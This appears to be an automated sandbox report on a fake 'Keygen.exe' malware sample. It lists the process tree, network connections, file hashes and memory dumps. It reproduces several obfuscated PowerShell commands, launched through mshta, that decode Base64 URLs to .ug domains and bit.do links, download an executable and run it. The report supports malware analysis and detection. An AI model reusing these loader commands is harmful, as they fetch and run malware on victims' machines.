PID 3784 wrote to memory of 5648 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3784 wrote to memory of 5648 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3784 wrote to memory of 5648 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4508 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 5532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 5532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 5532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4508 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4508 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 944 wrote to memory of 5720 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 5720 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 5720 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5532 wrote to memory of 5976 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5532 wrote to memory of 5976 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5532 wrote to memory of 5976 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4508 wrote to memory of 3424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 3424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 3424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 3424 wrote to memory of 6112 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3424 wrote to memory of 6112 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3424 wrote to memory of 6112 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4872 wrote to memory of 4764 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4872 wrote to memory of 4764 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4872 wrote to memory of 4764 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Keygen.exe

"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\685F.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"

C:\Users\Admin\AppData\Local\Temp\685F.tmp\Keygen.exe

Keygen.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\685F.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\685F.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\685F.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\685F.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\685F.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\685F.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""

Network

Country Destination Domain Proto
US 8.8.8.8:53 zxvbcrt.ug udp
US 8.8.8.8:53 bit.do udp
US 23.21.31.78:80 bit.do tcp
US 23.21.31.78:80 bit.do tcp
US 8.8.8.8:53 pdshcjvnv.ug udp
US 8.8.8.8:53 rbcxvnb.ug udp
US 23.21.31.78:80 bit.do tcp
GB 88.221.135.25:443 www.bing.com tcp
DE 142.250.185.131:80 c.pki.goog tcp
US 150.171.27.10:443 tcp
US 150.171.27.10:443 tcp
US 150.171.27.10:443 tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\685F.tmp\m.hta

MD5 9383fc3f57fa2cea100b103c7fd9ea7c
SHA1 84ea6c1913752cb744e061ff2a682d9fe4039a37
SHA256 831e8ee7bc3eeeaaa796a34cbb080658dec1be7eb26eb2671353f650041b220d
SHA512 16eda09f6948742933b6504bc96eb4110952e95c4be752e12732cb3b92db64daa7a7a0312ca78ff1ceb7cffd7bd8a7d46514226fc3cea375b4edb02a98422600

C:\Users\Admin\AppData\Local\Temp\685F.tmp\start.bat

MD5 68d86e419dd970356532f1fbcb15cb11
SHA1 e9ef9a9d047f1076ba2afbe4eabec2ea2338fb0a
SHA256 d150a28b978b2d92caac25ee0a805dec96381471702a97f1099707b8538c6cbe
SHA512 3078c8c33b18ca1aa3bb2f812e5f587f5b081a4bd857f942ab382383faf09dbe8af38054546bf49037b79081c9406dc25647ae5bd843abc8fcca25c7b3afae14

C:\Users\Admin\AppData\Local\Temp\685F.tmp\Keygen.exe

MD5 ea2c982c12fbec5f145948b658da1691
SHA1 d17baf0b8f782934da0c686f2e87f019643be458
SHA256 eecd6f108f35df83d4450effa5d5640efe7e5f2fff819833f01fb2d053e626d4
SHA512 1f1d6768467fff8387be1cf536e01cfbf28cb04777fa184f18fcab0c518ead8d52827abe5ca1c566c425616c7b06ab1bce0c92dd684c818b51fc52fa0f4b74b8

memory/4560-22-0x0000000000600000-0x0000000000603000-memory.dmp

memory/4560-21-0x0000000000400000-0x00000000005BC000-memory.dmp

memory/4560-23-0x0000000000830000-0x0000000000831000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\685F.tmp\m1.hta

MD5 5eb75e90380d454828522ed546ea3cb7
SHA1 45c89f292d035367aeb2ddeb3110387a772c8a49
SHA256 dd43305abbbe5b6cc4ab375b6b0c9f8667967c35bb1f6fefb0f1a59c7c73bd5e
SHA512 0670ef4f687c4814125826b996d10f6dd8a1dd328e04b9c436ee657486b27b1eefad5b82dcc25bd239d36b7ac488f98e5adcff56c5e82f7d0ed41f03301947c4

memory/4812-28-0x0000000004D30000-0x0000000004D66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\685F.tmp\b.hta

MD5 5bbba448146acc4530b38017be801e2e
SHA1 8c553a7d3492800b630fc7d65a041ae2d466fb36
SHA256 96355db8fd29dcb1f30262c3eac056ff91fd8fa28aa331ed2bedd2bd5f0b3170
SHA512 48e3d605b7c5531cb6406c8ae9d3bd8fbb8f36d7dd7a4cbe0f23fc6ef2df08267ce50d29c7ec86bf861ebdcf9e48fb9c61c218f6584f1a9a0289a10a2fec730b

memory/4812-32-0x00000000053A0000-0x00000000059C8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\685F.tmp\b1.hta

MD5 c57770e25dd4e35b027ed001d9f804c2
SHA1 408b1b1e124e23c2cc0c78b58cb0e595e10c83c0
SHA256 bb0fd0011d5a0c1bbb69cb997700eb329eee7bed75fef677122fcfda78edc7f5
SHA512 ac6d957d2b6218d9c19dea60b263d6148f730a7a4599e03023afc0881b9f4051d20e5f1d94fc3e416c5e12bcc9846a43af90f55767271ef0cc4b84f31f432ae7

memory/5648-34-0x0000000004C60000-0x0000000004C82000-memory.dmp

memory/4812-36-0x0000000005C70000-0x0000000005CD6000-memory.dmp

memory/4812-35-0x0000000005C00000-0x0000000005C66000-memory.dmp

memory/4812-37-0x0000000005CE0000-0x0000000006034000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wa5d303w.cq0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5648-74-0x0000000005C10000-0x0000000005C2E000-memory.dmp

memory/5648-75-0x0000000006160000-0x00000000061AC000-memory.dmp

memory/5648-76-0x0000000007360000-0x00000000079DA000-memory.dmp

memory/4812-77-0x00000000071F0000-0x000000000720A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\685F.tmp\ba.hta

MD5 b762ca68ba25be53780beb13939870b2
SHA1 1780ee68efd4e26ce1639c6839c7d969f0137bfd
SHA256 c15f61a3c6397babdf83b99b45345fec9851c4d3669c95b717f756b7c48050d1
SHA512 f99570d2dae550cb1474e2d1cabf8296a685e0e7254d92eb21d856acb8dece635a0842a00d63da2a4faa18c52c57244c565d6a752c857d5c15e8c23b3d4a9e1a

C:\Users\Admin\AppData\Local\Temp\685F.tmp\ba1.hta

MD5 a2ea849e5e5048a5eacd872a5d17aba5
SHA1 65acf25bb62840fd126bf8adca3bb8814226e30f
SHA256 0c4ffba2e00da7c021d0dcab292d53290a4dc4d067c029e5db30ba2ac094344c
SHA512 d4e53c150e88f31c9896decfaa9f0a8dfab5d6d9691af162a6c0577786620fb1f3617398fc257789a52e0988bf1bfc94255db6d003397863b0b9e82afabdb89f

memory/4812-100-0x00000000077D0000-0x0000000007866000-memory.dmp

memory/4812-101-0x0000000007770000-0x0000000007792000-memory.dmp

memory/4812-102-0x0000000008660000-0x0000000008C04000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c9b649256d9ddd85774423ff3c99ee8b
SHA1 fe7df1aa304c60331f79954b441c92f1a76dc538
SHA256 4c0f7a3b7b9bb5be1ee07eb81ee40ccc23c55adc6c2d68ccef9f3d49c89755d5
SHA512 487c6553b27ac549fca7867b872c45be6ef668b6d22315fc9a5f6fe3f647709e1d366df795758a94316e16b848cdd2b781f88ef456b9a025707b66cf925b72ec

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 25604a2821749d30ca35877a7669dff9
SHA1 49c624275363c7b6768452db6868f8100aa967be
SHA256 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

memory/4560-108-0x0000000000400000-0x00000000005BC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 68882a2a174a39d33a35f8ba4e900b92
SHA1 ddda1e91496f7ff93a0996a7e375b06e45c6d839
SHA256 79e6e76061ce02ae717d6af118ccf2ee427b68ad3e6709f6770f4cd65c952a90
SHA512 f7816dd9d766d2d375181d61c4bc5db2d394b40cb85472651fc11dfb2d91f8794387e86d2f38c29c76cbac8ea16203db3cb7865de87f4f7f4b4adf9febc43d59

memory/4560-112-0x0000000000830000-0x0000000000831000-memory.dmp

memory/4560-111-0x0000000000400000-0x00000000005BC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 06ad34f9739c5159b4d92d702545bd49
SHA1 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512 c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 92227069c218a710a4fd42e43670bf2a
SHA1 c34bd56483981d10d8624ea543e961d6f056867c
SHA256 7e348bb332ae824a0661c542343fa68bc816ff413b47ef48f65cac32973a01b8
SHA512 1d3e156a1801c419ada3684903d6f320d16b138f2e1a928d661619377f29f8edd3cce916bed3edf2998982cbaf013d8082ddbebe3c84a18d500860428138d711

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d0a806a9395d6c8ddee5d2a34df2270c
SHA1 9137d7ff3aad9c691f1523bc19f656e6a540785a
SHA256 5d84985fc622acf7c807c2e740d1f3fef7763f0d7d663ca9c942c3c804c8d9b2
SHA512 d52d3a6ce9f43a1b1c9aeb49608065935fbd44d141bcc9911f4dc8e3b147c8e877369e0486a80db176dead5e5ade93d44d286da2cd674ae6dcdaee00c8e42e9a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8e46c1c40effe64c4e4d008bc050a68e
SHA1 66587b5f11c501c29fb9a1a1a8b5bd8ff2a6005f
SHA256 7973ccaa92a20ed015d790f4a2a740053ccb5c0a73581afae73c3aa0f2e333fb
SHA512 b5fcdc8c80776ec089e4664eaf177670079b0af8b056277f06accfc47ff6e4c371b6ba61c8af092a999dd81feb8009147561eeb7bc369b1acc14dec368c925ac

Analysis: behavioral2

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

97s

Max time network

116s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe

"C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1660 -ip 1660

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 1624

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
RU 217.8.117.77:80 tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

memory/1660-0-0x00000000748DE000-0x00000000748DF000-memory.dmp

memory/1660-1-0x00000000009A0000-0x0000000000A00000-memory.dmp

memory/1660-2-0x0000000005920000-0x0000000005EC4000-memory.dmp

memory/1660-3-0x0000000005290000-0x0000000005322000-memory.dmp

memory/1660-4-0x00000000748D0000-0x0000000075080000-memory.dmp

memory/1660-5-0x0000000005350000-0x000000000535A000-memory.dmp

memory/1660-6-0x00000000080D0000-0x00000000085FC000-memory.dmp

memory/1660-7-0x0000000007D60000-0x0000000007D7C000-memory.dmp

memory/1660-8-0x00000000748DE000-0x00000000748DF000-memory.dmp

memory/1660-9-0x00000000748D0000-0x0000000075080000-memory.dmp

memory/1660-10-0x0000000007E80000-0x0000000007ECC000-memory.dmp

memory/1660-11-0x0000000007F70000-0x000000000800C000-memory.dmp

memory/1660-12-0x00000000748D0000-0x0000000075080000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

150s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
